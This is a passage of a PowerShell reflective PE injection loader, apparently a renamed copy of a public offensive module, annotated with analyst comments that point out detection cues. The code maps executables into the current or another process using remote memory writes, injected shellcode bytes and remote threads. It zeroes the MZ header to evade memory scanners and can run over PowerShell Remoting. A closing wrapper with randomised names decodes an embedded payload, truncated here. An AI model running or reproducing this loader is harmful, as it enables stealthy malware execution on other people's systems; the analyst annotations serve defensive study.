  2282.             $EffectivePEHandle = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, $LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
  2283.             if ($EffectivePEHandle -eq [IntPtr]::Zero)
  2284.             {
  2285.                 Throw "Unable to allocate memory in the remote process. If the PE being loaded doesn't support ASLR, it could be that the requested base address of the PE is already in use"
  2286.             }
  2287.         }
  2288.         else
  2289.         {
  2290.             if ($NXCompatible -eq $true)
  2291.             {
  2292.                 $PEHandle = $Win32Functions.VirtualAlloc.Invoke($LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
  2293.             }
  2294.             else
  2295.             {
  2296.                 $PEHandle = $Win32Functions.VirtualAlloc.Invoke($LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
  2297.             }
  2298.             $EffectivePEHandle = $PEHandle
  2299.         }
  2300.  
  2301.         [IntPtr]$PEEndAddress = Add-SignedIntAsUnsigned ($PEHandle) ([Int64]$PEInfo.SizeOfImage)
  2302.         if ($PEHandle -eq [IntPtr]::Zero)
  2303.         {
  2304.             Throw "VirtualAlloc failed to allocate memory for PE. If PE is not ASLR compatible, try running the script in a new PowerShell process (the new PowerShell process will have a different memory layout, so the address the PE wants might be free)."
  2305.         }
  2306.         [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, 0, $PEHandle, $PEInfo.SizeOfHeaders) | Out-Null
  2307.  
  2308.  
  2309.  
  2310.         Write-Verbose "Getting detailed PE information from the headers loaded in memory"
  2311.         $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants
  2312.         $PEInfo | Add-Member -MemberType NoteProperty -Name EndAddress -Value $PEEndAddress
  2313.         $PEInfo | Add-Member -MemberType NoteProperty -Name EffectivePEHandle -Value $EffectivePEHandle
  2314.         Write-Verbose "StartAddress: $(Get-Hex $PEHandle)    EndAddress: $(Get-Hex $PEEndAddress)"
  2315.  
  2316.  
  2317.  
  2318.         Write-Verbose "Copy PE sections in to memory"
  2319.         Copy-Sections -PEBytes $PEBytes -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types
  2320.  
  2321.  
  2322.  
  2323.         Write-Verbose "Update memory addresses based on where the PE was actually loaded in memory"
  2324.         Update-MemoryAddresses -PEInfo $PEInfo -OriginalImageBase $OriginalImageBase -Win32Constants $Win32Constants -Win32Types $Win32Types
  2325.  
  2326.  
  2327.  
  2328.         Write-Verbose "Import DLL's needed by the PE we are loading"
  2329.         if ($RemoteLoading -eq $true)
  2330.         {
  2331.             Import-DllImports -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants -RemoteProcHandle $RemoteProcHandle
  2332.         }
  2333.         else
  2334.         {
  2335.             Import-DllImports -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants
  2336.         }
  2337.  
  2338.  
  2339.  
  2340.         if ($RemoteLoading -eq $false)
  2341.         {
  2342.             if ($NXCompatible -eq $true)
  2343.             {
  2344.                 Write-Verbose "Update memory protection flags"
  2345.                 Update-MemoryProtectionFlags -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants -Win32Types $Win32Types
  2346.             }
  2347.             else
  2348.             {
  2349.                 Write-Verbose "PE being reflectively loaded is not compatible with NX memory, keeping memory as read write execute"
  2350.             }
  2351.         }
  2352.         else
  2353.         {
  2354.             Write-Verbose "PE being loaded in to a remote process, not adjusting memory permissions"
  2355.         }
  2356.  
  2357.  
  2358.  
  2359.         if ($RemoteLoading -eq $true)
  2360.         {
  2361.             [UInt32]$NumBytesWritten = 0
  2362.             $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $EffectivePEHandle, $PEHandle, [UIntPtr]($PEInfo.SizeOfImage), [Ref]$NumBytesWritten)
  2363.             if ($Success -eq $false)
  2364.             {
  2365.                 Throw "Unable to write shellcode to remote process memory."
  2366.             }
  2367.         }
  2368.  
  2369.  
  2370.  
  2371.         if ($PEInfo.FileType -ieq "DLL")
  2372.         {
  2373.             if ($RemoteLoading -eq $false)
  2374.             {
  2375.                 Write-Verbose "Calling dllmain so the DLL knows it has been loaded"
  2376.                 $DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
  2377.                 $DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool])
  2378.                 $DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)
  2379.  
  2380.                 $DllMain.Invoke($PEInfo.PEHandle, 1, [IntPtr]::Zero) | Out-Null
  2381.             }
  2382.             else
  2383.             {
  2384.                 $DllMainPtr = Add-SignedIntAsUnsigned ($EffectivePEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
  2385.  
  2386.                 if ($PEInfo.PE64Bit -eq $true)
  2387.                 {
  2388.  
  2389.                     $CallDllMainSC1 = @(0x53, 0x48, 0x89, 0xe3, 0x66, 0x83, 0xe4, 0x00, 0x48, 0xb9)
  2390.                     $CallDllMainSC2 = @(0xba, 0x01, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0xb8)
  2391.                     $CallDllMainSC3 = @(0xff, 0xd0, 0x48, 0x89, 0xdc, 0x5b, 0xc3)
  2392.                 }
  2393.                 else
  2394.                 {
  2395.  
  2396.                     $CallDllMainSC1 = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xf0, 0xb9)
  2397.                     $CallDllMainSC2 = @(0xba, 0x01, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x50, 0x52, 0x51, 0xb8)
  2398.                     $CallDllMainSC3 = @(0xff, 0xd0, 0x89, 0xdc, 0x5b, 0xc3)
  2399.                 }
  2400.                 $SCLength = $CallDllMainSC1.Length + $CallDllMainSC2.Length + $CallDllMainSC3.Length + ($PtrSize * 2)
  2401.                 $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)
  2402.                 $SCPSMemOriginal = $SCPSMem
  2403.  
  2404.                 Write-BytesToMemory -Bytes $CallDllMainSC1 -MemoryAddress $SCPSMem
  2405.                 $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC1.Length)
  2406.                 [System.Runtime.InteropServices.Marshal]::StructureToPtr($EffectivePEHandle, $SCPSMem, $false)
  2407.                 $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
  2408.                 Write-BytesToMemory -Bytes $CallDllMainSC2 -MemoryAddress $SCPSMem
  2409.                 $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC2.Length)
  2410.                 [System.Runtime.InteropServices.Marshal]::StructureToPtr($DllMainPtr, $SCPSMem, $false)
  2411.                 $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
  2412.                 Write-BytesToMemory -Bytes $CallDllMainSC3 -MemoryAddress $SCPSMem
  2413.                 $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC3.Length)
  2414.  
  2415.                 $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
  2416.                 if ($RSCAddr -eq [IntPtr]::Zero)
  2417.                 {
  2418.                     Throw "Unable to allocate memory in the remote process for shellcode"
  2419.                 }
  2420.  
  2421.                 $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)
  2422.                 if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))
  2423.                 {
  2424.                     Throw "Unable to write shellcode to remote process memory."
  2425.                 }
  2426.  
  2427.                 $RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions
  2428.                 $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)
  2429.                 if ($Result -ne 0)
  2430.                 {
  2431.                     Throw "Call to CreateRemoteThread to call GetProcAddress failed."
  2432.                 }
  2433.  
  2434.                 $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
  2435.             }
  2436.         }
  2437.         elseif ($PEInfo.FileType -ieq "EXE")
  2438.         {
  2439.  
  2440.             [IntPtr]$ExeDoneBytePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(1)
  2441.             [System.Runtime.InteropServices.Marshal]::WriteByte($ExeDoneBytePtr, 0, 0x00)
  2442.             $OverwrittenMemInfo = Update-ExeFunctions -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants -ExeArguments $ExeArgs -ExeDoneBytePtr $ExeDoneBytePtr
  2443.  
  2444.  
  2445.  
  2446.             [IntPtr]$ExeMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
  2447.             Write-Verbose "Call EXE Main function. Address: $(Get-Hex $ExeMainPtr). Creating thread for the EXE to run in."
  2448.  
  2449.             $Win32Functions.CreateThread.Invoke([IntPtr]::Zero, [IntPtr]::Zero, $ExeMainPtr, [IntPtr]::Zero, ([UInt32]0), [Ref]([UInt32]0)) | Out-Null
  2450.  
  2451.             while($true)
  2452.             {
  2453.                 [Byte]$ThreadDone = [System.Runtime.InteropServices.Marshal]::ReadByte($ExeDoneBytePtr, 0)
  2454.                 if ($ThreadDone -eq 1)
  2455.                 {
  2456.                     Copy-ArrayOfMemAddresses -CopyInfo $OverwrittenMemInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants
  2457.                     Write-Verbose "EXE thread has completed."
  2458.                     break
  2459.                 }
  2460.                 else
  2461.                 {
  2462.                     Start-Sleep -Seconds 1
  2463.                 }
  2464.             }
  2465.         }
  2466.  
  2467.         return @($PEInfo.PEHandle, $EffectivePEHandle)
  2468.     }
  2469.  
  2470.  
  2471.     Function Invoke-MemoryFreeLibrary
  2472.     {
            # Tears down a PE image that the loader above mapped into the *current* process:
            #   1. walks the image's import directory and calls FreeLibrary once per imported DLL,
            #   2. calls the image's entry point (DllMain) with reason code 0 (DLL_PROCESS_DETACH),
            #   3. releases the image's memory with VirtualFree(MEM_RELEASE).
            # Parameters:
            #   $PEHandle - base address of the manually mapped image (first element of the loader's return value).
            # Returns: nothing. Every failure is reported with Write-Warning and execution continues.
            # Analyst note: this only covers the in-process path; for an image written into another
            # process no counterpart free routine is visible in this part of the script.
  2473.         Param(
  2474.         [Parameter(Position=0, Mandatory=$true)]
  2475.         [IntPtr]
  2476.         $PEHandle
  2477.         )
  2478. 
  2479. 
  2480.         $Win32Constants = Get-Win32Constants
  2481.         $Win32Functions = Get-Win32Functions
  2482.         $Win32Types = Get-Win32Types
  2483. 
                # Re-parse the headers from the mapped image rather than from the original bytes.
  2484.         $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants
  2485. 
  2486. 
  2487.         if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0)
  2488.         {
  2489.             [IntPtr]$ImportDescriptorPtr = Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress)
  2490. 
                    # The IMAGE_IMPORT_DESCRIPTOR array is terminated by an all-zero entry; loop until it is reached.
  2491.             while ($true)
  2492.             {
  2493.                 $ImportDescriptor = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImportDescriptorPtr, [Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR)
  2494. 
  2495. 
  2496.                 if ($ImportDescriptor.Characteristics -eq 0 `
  2497.                         -and $ImportDescriptor.FirstThunk -eq 0 `
  2498.                         -and $ImportDescriptor.ForwarderChain -eq 0 `
  2499.                         -and $ImportDescriptor.Name -eq 0 `
  2500.                         -and $ImportDescriptor.TimeDateStamp -eq 0)
  2501.                 {
  2502.                     Write-Verbose "Done unloading the libraries needed by the PE"
  2503.                     break
  2504.                 }
  2505. 
                        # The DLL name is an RVA into the mapped image, read as an ANSI string.
  2506.                 $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi((Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$ImportDescriptor.Name)))
  2507.                 $ImportDllHandle = $Win32Functions.GetModuleHandle.Invoke($ImportDllPath)
  2508. 
  2509.                 if ($ImportDllHandle -eq $null)
  2510.                 {
  2511.                     Write-Warning "Error getting DLL handle in MemoryFreeLibrary, DLLName: $ImportDllPath. Continuing anyways" -WarningAction Continue
  2512.                 }
  2513. 
                        # NOTE(review): FreeLibrary is still invoked when the handle lookup above returned null;
                        # the warning does not skip this call, it only reports the lookup failure.
  2514.                 $Success = $Win32Functions.FreeLibrary.Invoke($ImportDllHandle)
  2515.                 if ($Success -eq $false)
  2516.                 {
  2517.                     Write-Warning "Unable to free library: $ImportDllPath. Continuing anyways." -WarningAction Continue
  2518.                 }
  2519. 
                        # Advance to the next descriptor by the marshalled struct size.
  2520.                 $ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR))
  2521.             }
  2522.         }
  2523. 
  2524. 
                # Entry point is called directly through a delegate built from the mapped address;
                # the second argument (0) is the DLL_PROCESS_DETACH reason.
  2525.         Write-Verbose "Calling dllmain so the DLL knows it is being unloaded"
  2526.         $DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
  2527.         $DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool])
  2528.         $DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)
  2529. 
  2530.         $DllMain.Invoke($PEInfo.PEHandle, 0, [IntPtr]::Zero) | Out-Null
  2531. 
  2532. 
                # VirtualFree with MEM_RELEASE requires a size of 0 and releases the whole region allocated at $PEHandle.
  2533.         $Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE)
  2534.         if ($Success -eq $false)
  2535.         {
  2536.             Write-Warning "Unable to call VirtualFree on the PE's memory. Continuing anyways." -WarningAction Continue
  2537.         }
  2538.     }
  2539.  
  2540.  
  2541.     Function Main
  2542.     {
            # Entry point of the scriptblock (runs in the local session, or on a remote host when the
            # outer function was given -ComputerName). Flow:
            #   1. resolve the optional target process from $ProcName / $ProcId and open a handle to it,
            #   2. hand $PEBytes to Invoke-MemoryLoadLibrary (in-process, or into the opened process),
            #   3. for a DLL, call the exported WStringFunc / StringFunc / VoidFunc selected by $FuncReturnType.
            # Reads the scriptblock parameters $PEBytes, $FuncReturnType, $ProcId, $ProcName, $ForceASLR, and
            # also $ExeArgs. NOTE(review): $ExeArgs is not one of the scriptblock's parameters; in the local
            # call it resolves through the caller's scope, on a remote host it is presumably unset - confirm.
            # Returns: nothing; string results are emitted with Write-Output, failures are thrown.
  2543.         $Win32Functions = Get-Win32Functions
  2544.         $Win32Types = Get-Win32Types
  2545.         $Win32Constants =  Get-Win32Constants
  2546. 
  2547.         $RemoteProcHandle = [IntPtr]::Zero
  2548. 
  2549. 
                # Exactly one of -ProcId / -ProcName may be used; a name is resolved to a single PID here.
  2550.         if (($ProcId -ne $null) -and ($ProcId -ne 0) -and ($ProcName -ne $null) -and ($ProcName -ne ""))
  2551.         {
  2552.             Throw "Can't supply a ProcId and ProcName, choose one or the other"
  2553.         }
  2554.         elseif ($ProcName -ne $null -and $ProcName -ne "")
  2555.         {
  2556.             $Processes = @(Get-Process -Name $ProcName -ErrorAction SilentlyContinue)
  2557.             if ($Processes.Count -eq 0)
  2558.             {
  2559.                 Throw "Can't find process $ProcName"
  2560.             }
  2561.             elseif ($Processes.Count -gt 1)
  2562.             {
  2563.                 $ProcInfo = Get-Process | where { $_.Name -eq $ProcName } | Select-Object ProcessName, Id, SessionId
  2564.                 Write-Output $ProcInfo
  2565.                 Throw "More than one instance of $ProcName found, please specify the process ID to inject in to."
  2566.             }
  2567.             else
  2568.             {
  2569.                 $ProcId = $Processes[0].ID
  2570.             }
  2571.         }
  2572. 
  2573. 
  2574. 
  2575. 
  2576. 
  2577. 
  2578. 
  2579. 
  2580. 
                # 0x001F0FFF is PROCESS_ALL_ACCESS. A cross-process open with this mask is a high-signal
                # event for endpoint telemetry (e.g. Sysmon Event ID 10 / EDR process-access hooks).
                # The handle obtained here is never closed anywhere in this function.
  2581.         if (($ProcId -ne $null) -and ($ProcId -ne 0))
  2582.         {
  2583.             $RemoteProcHandle = $Win32Functions.OpenProcess.Invoke(0x001F0FFF, $false, $ProcId)
  2584.             if ($RemoteProcHandle -eq [IntPtr]::Zero)
  2585.             {
  2586.                 Throw "Couldn't obtain the handle for process ID: $ProcId"
  2587.             }
  2588. 
  2589.             Write-Verbose "Got the handle for the remote process to inject in to"
  2590.         }
  2591. 
  2592. 
  2593. 
                # Local path maps the image into this PowerShell process; remote path stages it here and
                # writes it into the opened process. The loader returns @(localHandle, effectiveHandle).
  2594.         Write-Verbose "Calling Invoke-MemoryLoadLibrary"
  2595.         $PEHandle = [IntPtr]::Zero
  2596.         if ($RemoteProcHandle -eq [IntPtr]::Zero)
  2597.         {
  2598.             $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -ForceASLR $ForceASLR
  2599.         }
  2600.         else
  2601.         {
  2602.             $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle -ForceASLR $ForceASLR
  2603.         }
                # NOTE(review): $PELoadedInfo is a two-element array, so -eq acts as an element filter here
                # rather than the null check the message implies; whether this ever throws depends on
                # PowerShell's array/boolean coercion - verify before relying on it.
  2604.         if ($PELoadedInfo -eq [IntPtr]::Zero)
  2605.         {
  2606.             Throw "Unable to load PE, handle returned is NULL"
  2607.         }
  2608. 
  2609.         $PEHandle = $PELoadedInfo[0]
  2610.         $RemotePEHandle = $PELoadedInfo[1]
  2611. 
  2612. 
  2613. 
  2614.         $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants
                # In-process DLL: resolve one of three fixed export names and call it through a delegate.
                # The export names ("WStringFunc", "StringFunc", "VoidFunc") are a useful static indicator
                # for DLLs built to be used with this loader.
  2615.         if (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -eq [IntPtr]::Zero))
  2616.         {
  2617. 
  2618. 
  2619. 
  2620.             switch ($FuncReturnType)
  2621.             {
  2622.                 'WString' {
  2623.                     Write-Verbose "Calling function with WString return type"
  2624.                     [IntPtr]$WStringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "WStringFunc"
  2625.                     if ($WStringFuncAddr -eq [IntPtr]::Zero)
  2626.                     {
  2627.                         Throw "Couldn't find function address."
  2628.                     }
  2629.                     $WStringFuncDelegate = Get-DelegateType @() ([IntPtr])
  2630.                     $WStringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WStringFuncAddr, $WStringFuncDelegate)
  2631.                     [IntPtr]$OutputPtr = $WStringFunc.Invoke()
  2632.                     $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($OutputPtr)
  2633.                     Write-Output $Output
  2634.                 }
  2635. 
  2636.                 'String' {
  2637.                     Write-Verbose "Calling function with String return type"
  2638.                     [IntPtr]$StringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "StringFunc"
  2639.                     if ($StringFuncAddr -eq [IntPtr]::Zero)
  2640.                     {
  2641.                         Throw "Couldn't find function address."
  2642.                     }
  2643.                     $StringFuncDelegate = Get-DelegateType @() ([IntPtr])
  2644.                     $StringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($StringFuncAddr, $StringFuncDelegate)
  2645.                     [IntPtr]$OutputPtr = $StringFunc.Invoke()
  2646.                     $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($OutputPtr)
  2647.                     Write-Output $Output
  2648.                 }
  2649. 
                        # Unlike the two cases above, a missing VoidFunc export is silently ignored.
  2650.                 'Void' {
  2651.                     Write-Verbose "Calling function with Void return type"
  2652.                     [IntPtr]$VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "VoidFunc"
  2653.                     if ($VoidFuncAddr -eq [IntPtr]::Zero)
  2654.                     {
  2655. 
  2656.                     }
  2657.                     else
  2658.                     {
  2659.                     $VoidFuncDelegate = Get-DelegateType @() ([Void])
  2660.                     $VoidFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VoidFuncAddr, $VoidFuncDelegate)
  2661.                     $VoidFunc.Invoke() | Out-Null
  2662.                     }
  2663.                 }
  2664.             }
  2665. 
  2666. 
  2667. 
  2668.         }
  2669. 
                # DLL written into another process: rebase the VoidFunc address from the local staging copy
                # ($PEHandle) to the remote image ($RemotePEHandle) and start it on a new thread there.
                # $RThreadHandle is neither waited on nor closed in this function.
  2670.         elseif (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -ne [IntPtr]::Zero))
  2671.         {
  2672.             $VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "VoidFunc"
  2673.             if (($VoidFuncAddr -eq $null) -or ($VoidFuncAddr -eq [IntPtr]::Zero))
  2674.             {
  2675. 
  2676.             }
  2677.             else{
  2678.             $VoidFuncAddr = Sub-SignedIntAsUnsigned $VoidFuncAddr $PEHandle
  2679.             $VoidFuncAddr = Add-SignedIntAsUnsigned $VoidFuncAddr $RemotePEHandle
  2680. 
  2681. 
  2682.             $RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $VoidFuncAddr -Win32Functions $Win32Functions
  2683.             }
  2684.         }
  2685. 
  2686. 
  2687. 
                # Both branches below are empty as pasted: neither the mapped image nor $RemoteProcHandle is
                # released before returning (Invoke-MemoryFreeLibrary is defined above but never called here),
                # so the image stays resident in the host process after Main completes.
  2688.         if ($RemoteProcHandle -eq [IntPtr]::Zero -and $PEInfo.FileType -ieq "DLL")
  2689.         {
  2690. 
  2691.         }
  2692.         else
  2693.         {
  2694. 
  2695. 
  2696. 
  2697. 
  2698. 
  2699. 
  2700.         }
  2701. 
  2702.         Write-Verbose "Done!"
  2703.     }
  2704.  
  2705.     Main
  2706. }
  2707.  
  2708.  
  2709. Function Main
  2710. {
        # Outer entry point, run with the enclosing function's bound parameters. It validates that
        # $PEBytes begins with the 'MZ' DOS signature, zeroes those two bytes in the caller's array unless
        # -DoNotZeroMZ was given, builds the $ExeArgs string, and then dispatches $RemoteScriptBlock either
        # in the local session or to every host in $ComputerName.
        # Returns: whatever the scriptblock writes to the output stream; throws on an invalid PE.
  2711.     if (($PSCmdlet.MyInvocation.BoundParameters["Debug"] -ne $null) -and $PSCmdlet.MyInvocation.BoundParameters["Debug"].IsPresent)
  2712.     {
  2713.         $DebugPreference  = "Continue"
  2714.     }
  2715. 
  2716.     Write-Verbose "PowerShell ProcessID: $PID"
  2717. 
  2718. 
            # Only the two-byte DOS signature is checked; no other header validation happens here.
  2719.     $e_magic = ($PEBytes[0..1] | % {[Char] $_}) -join ''
  2720. 
  2721.     if ($e_magic -ne 'MZ')
  2722.     {
  2723.         throw 'PE is not a valid PE file.'
  2724.     }
  2725. 
            # Mutates the caller's $PEBytes in place. Because the signature is removed before mapping,
            # memory scanners that key solely on an 'MZ' marker at the image base will not see it;
            # header-less PE images at private RWX/RX allocations are the pattern to hunt for instead.
  2726.     if (-not $DoNotZeroMZ) {
  2727. 
  2728. 
  2729.         $PEBytes[0] = 0
  2730.         $PEBytes[1] = 0
  2731.     }
  2732. 
  2733. 
            # Command-line string handed to an EXE payload; "ReflectiveExe" presumably fills the
            # program-name slot (argv[0]) - its consumer, Update-ExeFunctions, is outside this part of the file.
            # NOTE(review): $ExeArgs is not included in -ArgumentList below although the scriptblock reads it.
  2734.     if ($ExeArgs -ne $null -and $ExeArgs -ne '')
  2735.     {
  2736.         $ExeArgs = "ReflectiveExe $ExeArgs"
  2737.     }
  2738.     else
  2739.     {
  2740.         $ExeArgs = "ReflectiveExe"
  2741.     }
  2742. 
            # Without -ComputerName the scriptblock runs in this process. With it, the scriptblock and the
            # full PE byte array are serialized and executed on the remote host(s) over PowerShell Remoting
            # (WinRM), so the loader activity appears there under the remoting host process.
  2743.     if ($ComputerName -eq $null -or $ComputerName -imatch "^\s*$")
  2744.     {
  2745.         Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName,$ForceASLR)
  2746.     }
  2747.     else
  2748.     {
  2749.         Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName,$ForceASLR) -ComputerName $ComputerName
  2750.     }
  2751. }
  2752.  
  2753. Main  # Run the outer Main above with the enclosing function's bound parameters.
  2754. }
  2755.  
  2756. function Invoke-WPGPLHJSVPEOZPOJBAXMJ
  2757. {
        # Wrapper that carries an embedded, base64-encoded PE and hands it to the loader function above.
        # Both function names appear randomly generated; the helper names used throughout
        # (Invoke-MemoryLoadLibrary, Get-MemoryProcAddress, the "ReflectiveExe" marker) match the public
        # Invoke-ReflectivePEInjection module, so this is presumably a renamed copy of it.
        # NOTE(review): the string literal on the next line is unterminated as pasted - the base64 payload
        # was stripped from this page, so no payload hash or IoC can be derived from it, and the function
        # as shown does not parse.
  2758. 
  2759. $PEBytes32 = "
  2760. 
  2761. [Byte[]]$PEBytes = [Byte[]][Convert]::FromBase64String($PEBytes32)
        # Only -PEBytes is supplied, so the loader's defaults apply: no target process (the image is mapped
        # into the current PowerShell process), -FuncReturnType 'Void', no -ComputerName, and the MZ
        # signature is zeroed because -DoNotZeroMZ is not given.
  2762. Invoke-YZSIPFNXTHVFWKM -PEBytes $PEBytes
  2763. 
  2764. }